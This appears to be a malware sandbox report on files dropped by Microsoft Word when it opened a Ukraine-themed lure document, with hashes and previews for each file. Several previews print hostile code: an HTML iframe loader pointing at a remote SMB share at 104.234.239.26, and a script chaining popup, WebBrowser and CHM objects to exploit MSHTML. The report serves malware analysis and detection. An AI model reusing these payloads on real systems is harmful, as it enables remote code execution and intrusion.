SHA1:	4B8D5714F58A45A871D228534D0AD8EAFA9BFFC1
SHA-256:	B4BCBAEA3C6F06CD2AF41DB3DAC0080E7B7A3B64AE6922F68072DA47D5A4FB84
SHA-512:	81D8CF75B74E1304B2A591F02E9320067BA70C2BC5A655A4AD5C7B9EFEB92E239AA849F5988DD46DEFB57C2E907F3EDF29EEA7BCB13376EB99B3F02BC7A8E08E
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.q.._LrI...l.C.wS,...X.F...Fa.q............................s..e..)N....Q...........=.`...B...q...V.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{69A43BD0-59CA-4096-A289-DE6006A14492}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6728612944189655
Encrypted:	false
SSDEEP:	96:KACyZ6KPawytLi3oGo9hvbwWQ/XYFkdvzu4:jMDXG05o/dLl
MD5:	0DCD8B26E278CCE79BB249E9AF19233A
SHA1:	144DD15935E1582CC9839DD4454736C92E13A3FE
SHA-256:	3FC7A72EC7B449C03200BDABCED68C77CB69A12424D0F996672C8854CFAB4401
SHA-512:	8AA7994F3751969D87811E939040648232A2D33A58499BC9A7B792E1121C9D2FF668EE5928F418FA6D11DC8C8083C1089A02943778DDA3D603BD9087B6953DA7
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.R..2.LH..H...\|.S,...X.F...Fa.q..............................Q.f.J.$.../.(........O.Hv...B.u..x.+..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9356535494478795
Encrypted:	false
SSDEEP:	3:yVlgsRlzfilhPl8lmDWTLcpTZflDRMIFl276:yPblzE4lmDWcb8g22
MD5:	D696C204E3AC66EB8EBD8E0B312357B1
SHA1:	DB2C3FD4F1C703A8CF5201DE0173FF7EAC28FEF5
SHA-256:	FBB6BC1CDA888C99C78EE400EB010561D8F76895418F9A16B5A1BAC7A18ECA41
SHA-512:	55CBB18D8A57AA0955C6140E90C372BEA29806E56D791BFDEF561DBA438A97AF90DE85D6074F91E213FB4A32E0C0DE42EC674915C104453CE6C1C080B8BDAF5D
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.6.9.A.4.3.B.D.0.-.5.9.C.A.-.4.0.9.6.-.A.2.8.9.-.D.E.6.0.0.6.A.1.4.4.9.2.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2876303810488392
Encrypted:	false
SSDEEP:	768:phSpAvFcle/u+Sw4AFuwyai/M+Nuwyai/M+:
MD5:	7BADB022E69323D841DFCC6093E45FC7
SHA1:	4C5B7A61D0A173BF6807405BA0EE350F55F1F9CF
SHA-256:	4BA8B8E3318B49D7274C46DCDAF6AC38923FF99D48A593B80E112D8A26F4A49A
SHA-512:	9609F887EB007E0662470694EE5C9913EA9823DCEEA46A0FFFF63FFE393EE5CCCA6A4D37AF8FB640D38C5CE3170B4231C900DB24971AB41BEBC66C14C8B6DC5B
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.A....rL......Z3S,...X.F...Fa.q............................[.v/..K.$^.............K....KI..V.P....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C8AD303A-D920-41B8-AD68-D547D1AB80FD}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22207651913290175
Encrypted:	false
SSDEEP:	48:I3KG/5UrBlE3tR9dD6QqbEMLsRaYhlOj4oNgNO:K/RCK3D6QqzUaYDh8EO
MD5:	15206A7347C06908A482148898486287
SHA1:	D23C9C69DF7C134036EB37B4EF845E4E63580D8C
SHA-256:	53BD8D58E5A0BECC46D4CA43B3BA820D6DFFEF0F6C75F78976BAB846BCEB72A0
SHA-512:	2A48E3233301F23C10AA0A681FFE1EF3946C931A5C9C67828ECDF39A6335FFD315A8D8A5945661222D68B9C8929EF98C659A13D6F6D89EB538E00EA249F742D9
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.......B....NMG.S,...X.F...Fa.q.............................Y...O.N...fEf.6............-.D....F..]P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.918985702694457
Encrypted:	false
SSDEEP:	3:yVlgsRlzkq7lQXdIoIlAy0Khtn9fu276:yPblzFlGIoIlZS22
MD5:	032105ADDF4E6F089D8FD86BED8B9B93
SHA1:	912C7FF3BCB1C0D1F812891B6190E548CF97CE02
SHA-256:	683A15B5F5BE89EE39D75434DE69AFBEA0FB58B790EF3B031F90854E37A3F2DB
SHA-512:	A0C2CA5543C5A3284C4E919E5D3711D09CAD3ABE09A7E94B6EBC20CE687155817C260ADEB6614217C30F020BAF85465B3B65177A33F4C6621696136AAAB55345
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.C.8.A.D.3.0.3.A.-.D.9.2.0.-.4.1.B.8.-.A.D.6.8.-.D.5.4.7.D.1.A.B.8.0.F.D.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RFile[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.373930373433136
Encrypted:	false
SSDEEP:	6:qzAosxNRQB8BGQjW8rLoW1Yp1BXCQBGQjW8rZBigSHXiOI:kADtBGr8QW1UBXCQBGr8YXiOI
MD5:	0F13071767594EB7A020DACA51F4E543
SHA1:	30FA58DB9C5270AAC68C205F391BE9389A8E679B
SHA-256:	1F59A2880BE23F7A99597F6B3AF7E1EF1FF7FF908A58B2D082071F60B3EA52B5
SHA-512:	368CABD8002DE2420291A45A61C52BAB15408FB08412398874CC94E6B892141E430F0B21776662077AC0BD4B0A37EB1D13E24CD1CDA046375D8579A4651C753F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_iframeloadingfromremoteserver, Description: Yara detected iframe remote loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RFile[1].htm, Author: Joe Security
Reputation:	low
Preview:	<html><body onload=setTimeout('fx()',30000)><iframe src=file://104.234.239.26/share1/MSHTML_C7></iframe><script>function fx() { document.body.innerHTML='<iframe src=file://104.234.239.26/share1/MSHTML_C7/1/84.17.52.5_bc8d1_file001.htm?d=84.17.52.5_bc8d1_></iframe>'; } </script></body></html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\zip_k3[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document text
Category:	modified
Size (bytes):	66
Entropy (8bit):	1.2628822391789147
Encrypted:	false
SSDEEP:	3:qVUNNU7Gb:qANkGb
MD5:	67DA67C9F53B8197E4CD48329718FC28
SHA1:	8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
SHA-256:	C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
SHA-512:	427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
Malicious:	false
Reputation:	low
Preview:	<html>11111111111111111111111111111111111111111111111111111</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\A1ALYMN5

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	GIF image data, version 89a, 13 x 13
Category:	dropped
Size (bytes):	847
Entropy (8bit):	1.2715719481504135
Encrypted:	false
SSDEEP:	3:CkI///l//vlXt1aQ//a/luAqqR/GWLA/lt/5ljS1YkmzhSjqvUCfpcWtUFE:BQHqiq52lk1Y7eCbtU2
MD5:	19B552D38D77095022117290C04709A1
SHA1:	DCE3B45D141206D3C50BC09C4154144B11CA1193
SHA-256:	D1A4991A96883D71F2A3C4C8A072FD2F33B4C08A64287ECDD8BB27EB7764A624
SHA-512:	06BBE7EF3F0A386B0CA58156CD418C500EB526AD7851DD2B3E2E4D75D983D8C0299474D919404375BFC8572963CC3DD1100CAD5AFAED5B904429E6FB31E3FB1F
Malicious:	false
Reputation:	low
Preview:	GIF89a.................................@.@@....@.@...@..........................................@............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................,..........4....H......Z...!...>D8qaD...>,.."G..AB..Q"..Q...1 .;

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\zip_k2[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document text
Category:	dropped
Size (bytes):	66
Entropy (8bit):	1.2628822391789147
Encrypted:	false
SSDEEP:	3:qVUNNU7Gb:qANkGb
MD5:	67DA67C9F53B8197E4CD48329718FC28
SHA1:	8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
SHA-256:	C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
SHA-512:	427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
Malicious:	false
Reputation:	low
Preview:	<html>11111111111111111111111111111111111111111111111111111</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\start[1].xml

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	XML document text
Category:	dropped
Size (bytes):	576
Entropy (8bit):	5.325609436459455
Encrypted:	false
SSDEEP:	12:MMHdjR9JoTIB99bx4Wh9abdcs/NSmDXuM8nKhoZM1GMGw:JdjR9JoUnJx4WvID9DXuMkM7P
MD5:	0C72B2479316B12073D26C6ED74D3BDC
SHA1:	D46E2B72890C180C33648326BD37F59BA77291C4
SHA-256:	48142DC7FE28A5D8A849FFF11CB8206912E8382314A2F05E72ABAD0978B27E90
SHA-512:	E81982B81AD20CDC2402C6C80041BEA83773E6B5D30ABAA50F5E9EE11E5278F4A032BDBAEC34968BD03AAD0770D101B98A88408F9DFD8483F45FC0BDC2EBA90D
Malicious:	false
Reputation:	low
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<?xml-stylesheet type='text/xsl' href='#'?>....<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl" xmlns:xslt="http://www.w3.org/1999/XSL/Transform" result-ns="">..<xsl:template match="/">....<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="X-UA-Compatible" content="IE=7"/>..</head>....<body>......<iframe src='RFile.asp' width='800' height='800'></iframe>..<script defer=''>....lt=String.fromCharCode(60);..gt=String.fromCharCode(62);....</script>....</body>..</html>....</xsl:template>..</xsl:stylesheet>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\zip_k[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document text
Category:	dropped
Size (bytes):	66
Entropy (8bit):	1.2628822391789147
Encrypted:	false
SSDEEP:	3:qVUNNU7Gb:qANkGb
MD5:	67DA67C9F53B8197E4CD48329718FC28
SHA1:	8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
SHA-256:	C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
SHA-512:	427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
Malicious:	false
Reputation:	low
Preview:	<html>11111111111111111111111111111111111111111111111111111</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\714CDA5E.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image, 219 x 219, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	96252
Entropy (8bit):	7.9932951858885435
Encrypted:	true
SSDEEP:	1536:oULeKytQVl7xR8oLcrDGKaCeOSd8H2vRCcwziwX4Ym0sIe7wHvUExq2hCIXy1:oULFyt0l7P8trDG5CL1WvRC5pugMExF0
MD5:	BC1CCF91CC3D7F39497E5287B10EB78B
SHA1:	0E84A621E84212D161418B6D6629AB91B2A41FCD
SHA-256:	88E4EC9AF07F3B56D4131D0A2D2EECC63F971CA41E185904036BA0B41B40BBB6
SHA-512:	E542531996D95FF6337CE2B59D39024AD74E1228C5C2F039F23B0BCFAC94BE55FECB99B575112885A57E4BE29CC13E4459B7CDBAFB58D9FAB2E3D19102BF3C08
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...............@....IDATx^......><.4.4.M.....M.].nl@b..h.Q`...0PRD@z.......Z..G=z<.9..........O.k.k..=.=~.hG.Z.....Z8[u..q.#g.g+.nm........J..TS^k...\|..Zt.u.v~Nf..m.L[.u>oA.7.&?...w\...o....v.9...j.e...t..j_n.c../....<GG.n...:....8.~.............%.H.._...s.uh.....).-\|l.v%.".m:p5...%..6...]...C+.i{%...Q}?..D?............x....bt.D,..D.5..h..L....Zi8lS .w@j...8w."j.\@Ay=..V....hO...8../...M_..X...+3v`i.v..\|/2v.D.W....2\|}....P^w../^....."...N..=.tJE.S..(...d....:....:....14..I...i.]^k... 4...5......v.....2d~v.q....Mx.'.....c0....<#..<.a...#go.8.p.A...z...e.\|t.^..\|...F..0..k8z..c.W0n.#.V..`...s..<....%..2}'.......4......04."@j..c..y<r..2j.hU..{...o...!.G?.....] &........[q......#t.Wxr.Z.<..C...9.c`...6..2........w...K,.\.`.....p.(..n1...n.`...<"`...v.0.7...}`.....x.%r.q.w.Bw.`t.'(m..)...P...c..?&=...^_.7...d3Ax....^Rj.......>.(..h.^.=...7.~...o}?.\..o..`Y.v<....O%....;A.B.m.....RE..#.F.=8..FpF..G.[.z.......$..{....sO>.yO.8..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eduardo, Template: Normal.dotm, Last Saved By: Eduardo, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 12 14:11:00 2022, Last Saved Time/Date: Tue Apr 12 14:11:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Category:	dropped
Size (bytes):	23870
Entropy (8bit):	3.126890272974214
Encrypted:	false
SSDEEP:	192:zWjUlLZEvA+6/6rNavrgYjk+4bWl92zBi1RH1rGOJU:zWjo8iSwvxjk+t9+i1RH1rG3
MD5:	26A6A0C852677A193994E4A3CCC8C2EB
SHA1:	70560AFF35F1904F822E49D3316303877819EEF8
SHA-256:	07377209FE68A98E9BCA310D9749DAA4EB79558E9FC419CF0B02A9E37679038D
SHA-512:	BF35991FEC81B96EAE2CE5C90AE627DD6CF11C61C5369DC34BBBC65E24C3E1F413F475BDB8321F455E5F4B6EAA833B3D33F847C744C68AE6E853A373AD2B37AE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RTFMSHTMLIFRAME, Description: Yara detected RTF with MSHTML iframe injection, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url, Author: Joe Security
Reputation:	low
Preview:	......................>.........<html>........'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................=.............................bjbj..............................L..hL..h..................................................................................F.......F...............................................................................................................t...................................................................M.......O.......O.......O.......O.......O.......O...$...B...........F...s.....................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWYp:qYp
MD5:	ACC88D3264FC06AE3584A8ED90009260
SHA1:	FD63700F852BE379C417253CA869CC1C5E2F46A0
SHA-256:	E9066838A2265B9327318C602ED6954BC1A26869C19FAA255CD26A3C7CE707A7
SHA-512:	CB41EF87941B26F1CB25DB61536A6C89F3B7A3BC67B4CFBE7290DD528DACC6870A08CDC2AABAF289382A5CD7EF96C95556B05B8EAD3FB1317DFCD18B6302E456
Malicious:	false
Reputation:	low
Preview:	[ZoneTransfer]..ZoneId=1..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	CDF V2 Document, corrupt: Cannot read summary info
Category:	dropped
Size (bytes):	19968
Entropy (8bit):	2.914125393755248
Encrypted:	false
SSDEEP:	192:qISAsKyGhSAs1RDPRDU9CFxfSAsDRDY9xHSAs1RDY9:cFKyjFZaFAyF
MD5:	E0DFD84F50DBC977EDB445041A816DBD
SHA1:	E918E7CED3B7E3697D1C06400658C2EF728FE297
SHA-256:	304E1A7EB498B0D6AFD076AFC8E71FFC0FAE5080D5796F328EB40192DC97DEAF
SHA-512:	6DC246278287A70F33AB85F60F86922CAD8E9FD150DC98FD204921BE8457BB4F6F291106784C8452358BBE3A4FBF59BD5B081FA73F7352E79DAA069041FF9A2F
Malicious:	false
Reputation:	low
Preview:	......................>............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!...%..."...#...$...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7C2C44C-1140-4E43-A415-F39DE2B8E989}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E91871FC-BFD2-4C90-871A-4BA39F60B253}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	2.550711213392701
Encrypted:	false
SSDEEP:	12:qWwAwNKl6ATQu1it0TAwqv/Aj/QodQQq+R0Yq/lN103Ka3z:qWwAQKpTQuEHk4gR0Yq/dMz
MD5:	947E3356A835C93D21AD49186C723F97
SHA1:	1D31B02EDA72B614660C9A4DA9FF438C5AC58BE5
SHA-256:	37C7915F7FBC726F10A8547E03AC8070647EF2C0AA1A584A41F470211B7896A7
SHA-512:	70DC3B45B8FF83D721CCA73C68E7543D48C94654E8AEF6F42522C7C36B8F64CEDD1C966D480DDB9E050E9EB2E5492A2538B74BE9982488E33C556E210734820B
Malicious:	false
Reputation:	low
Preview:	X.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.o.f.f.i.c.e./.w.o.r.d./.2.0.0.3./.w.o.r.d.m.l.2.4.5.0.......).(.).(.).(.).(.).(.). .....W.o.r.d...D.o.c.u.m.e.n.t...8.=. . ......... .\.a. .\.t. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".\.\.\.\.1.0.4...2.3.4...2.3.9...2.6.\.\.s.h.a.r.e.1.\.\.M.S.H.T.M.L._.C.7.\.\.f.i.l.e.0.0.1...u.r.l.". .".".L.I.N.K.x.m.l.f.i.l.e.{.0.0.0.0.0.3.0.0.-.0.0.0.0.-.0.0.0.0.-.C.0.0.0.-.0.0.0.0.0.0.0.0.0.0.4.6.}.=. . ......... .\.a. .\.t. .h.t.m.l.f.i.l.e.......................................................................b.......................................................................................................................................................................................................................................................................................................................j....OJ..QJ..U..mH..sH...5..OJ..QJ..mH..sH...OJ..QJ..mH..sH.....h.1l.OJ..QJ..mH..sH.....h.1l.5..OJ..QJ..\..mH..sH... CJ..OJ..Q

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F6E701FB-5C4F-4237-8934-5D6E6D5988D5}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.2293589277751447
Encrypted:	false
SSDEEP:	96:dixTLsH5svkLvwbVFnYk12kj98zlz/InyVS/VF2we1ki92VnX6FQNmyxUWou/aCU:48H9vwpq0bx8d/stiyDnLDxnlpU
MD5:	C62A11B04E8F1620491672F10C6A5CAA
SHA1:	CBD8670B9B517BE3BDC931CA04BD3749E2450B63
SHA-256:	DFDA062224736914D5054D4832C3F70A8B5D77C43D9FBB2BF42574C4CC53CF31
SHA-512:	9109070DAEBD735F94CC2C8D7D09861974C8CD022057C08C0B87ABF46C9182803B90139785CD50F998706DC9488C71C96A866C88FAEA4ED1003A68EE5780016E
Malicious:	false
Reputation:	low
Preview:	../.................T.a.l.k.i.n.g. .p.o.i.n.t.s. .f.o.r. .U.W.C.. s. .#.U.k.r.a.i.n.e.I.n.N.A.T.O. .c.a.m.p.a.i.g.n.....T.o.d.a.y.,. .U.k.r.a.i.n.e. .i.s. .f.i.g.h.t.i.n.g. .f.o.r. .m.o.r.e. .t.h.a.n. .i.t.s. .o.w.n. .f.r.e.e.d.o.m.,. .i.n.d.e.p.e.n.d.e.n.c.e. .a.n.d. .s.o.v.e.r.e.i.g.n.t.y.;. .U.k.r.a.i.n.e. .i.s. .f.i.g.h.t.i.n.g. .f.o.r. .t.h.e. .f.r.e.e.d.o.m. .o.f. .E.u.r.o.p.e. .a.n.d. .f.o.r. .t.h.a.t. .o.f. .t.h.e. .e.n.t.i.r.e. .F.r.e.e. .W.o.r.l.d.,. .f.o.r. .t.h.e. .v.e.r.y. .v.a.l.u.e.s. ...............................................v...x...........Z.......8...:.......B....... ..."................................................................................................................................................................................................................................................................................................................................................................................................d........&..F..

C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_bc8d1_file001.zip\1111.txt

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document text
Category:	dropped
Size (bytes):	1272
Entropy (8bit):	5.520959394979567
Encrypted:	false
SSDEEP:	24:k5kBmPTEuPkuIuGdENZIGdE4RRS5t9pmETDgnfAJ4j3HSrz:WkBWEucFuGdENeGdE4e5iy4j3yv
MD5:	E65A1828D6AFE3F27B4EC7EC1A2FEE20
SHA1:	18C1F21D8AABAAD6EDF1D5DA5ACAA9A4CA3C6D67
SHA-256:	F08CC922C5DAB73F6A2534F8CEEC8525604814AE7541688B7F65AC9924ACE855
SHA-512:	5FC4C3FCA5606FB6B12A2C73C788BE9B8ED26674E7AB7CED6D0C669A578055DE41942C38F75805D9DD860307C177C8C828FA0E2B2334CE4BEFDD6D12BF365E28
Malicious:	false
Reputation:	low
Preview:	<html><body><div id=d1></div>..<script defer>....loc=location.href.toLowerCase();....qs=loc.indexOf('?');....lb = loc.lastIndexOf('/');......if (loc.indexOf('?wb') == -1) {......if (qs == -1)..{..loc2 = loc;..}....else {..loc2=loc.substring(0,qs);..}....loc2=loc2 + '?wb=1';......p=createPopup();..p.show(0,0,1,1);....p.document.write('<object id=wb classid=clsid:8856F961-340A-11D0-A96B-00C04FD705A2><param name=Location value=' + loc2 + '></object>');..}....else {......dl = loc.indexOf('c:');....shb = loc.indexOf('c$');......if (dl != -1) {....loc2 = loc.substring(dl,lb+1);....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......if (shb != -1) {....loc2 = loc.substring(shb,lb+1);....loc2 = loc2.replace('c$','c:');....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......document.getElementById('d1').innerHTML='<OBJECT id=h2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 width=40% height=40%><PARAM name="Command" value="related topics,MENU"><param name=button value=text:x><pa

C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_bc8d1_file001.zip\1111.txt:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Reputation:	low
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\msoE39.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	GIF image data, version 89a, 15 x 15
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.949125862393289
Encrypted:	false
SSDEEP:	12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
MD5:	ED3C1C40B68BA4F40DB15529D5443DEC
SHA1:	831AF99BB64A04617E0A42EA898756F9E0E0BCCA
SHA-256:	039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
SHA-512:	C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
Malicious:	false
Reputation:	low
Preview:	GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

C:\Users\user\AppData\Local\Temp\{A1086441-2541-4563-A805-403B727CE9BF}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025499767226127387
Encrypted:	false
SSDEEP:	6:I3DPccFVvxggLRgSRz9tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPDFZUSV9TvYg3J/
MD5:	F456936A28F3169E6410D735EDAD372B
SHA1:	9BA72A2FA8B581B9F9ABA5D494148E61ACCC365C
SHA-256:	C056853A0260EC33C95FF2FDA80887B02E59E9835F66EB9F24DC3E196866B887
SHA-512:	D7C143DFED8570B80460B932329246D8195DF8D599486E2D1304D0FB8E346CCAD0FA4294BF35B3A86B399DFD8B68F7F455A41C85CD85C690624E923E8C4D0576
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.A....rL......Z3S,...X.F...Fa.q............................!.rj..VL..4.W^...........K....KI..V.P........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{B221F3E1-BBD5-498C-8D01-9802449BFE1E}

Download File

